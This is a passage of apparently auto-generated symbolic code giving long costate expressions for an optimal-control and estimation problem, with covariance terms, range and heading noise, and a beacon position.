(tf)*(-lamP11_N*(p11_n*p11_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(-2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - 2*p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p11_s - lamP12_N*(-Dt*sigv**2*theta_s*sin(theta_n*theta_s)**2 + Dt*sigv**2*theta_s*cos(theta_n*theta_s)**2 - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p12_s + lamP13_N*p33_n*p33_s*theta_s*v*cos(theta_n*theta_s)/p13_s - lamP22_N*(2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p23_n*p23_s*theta_s*v*sin(theta_n*theta_s))/p22_s + lamP23_N*p33_n*p33_s*theta_s*v*sin(theta_n*theta_s)/p23_s + lamX_N*theta_s*v*sin(theta_n*theta_s)/x_s - lamY_N*theta_s*v*cos(theta_n*theta_s)/y_s),
(tf)*(-lamP11_N*(-p11_n*p11_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p12_n*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p11_s*p12_n*p12_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p11_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s),
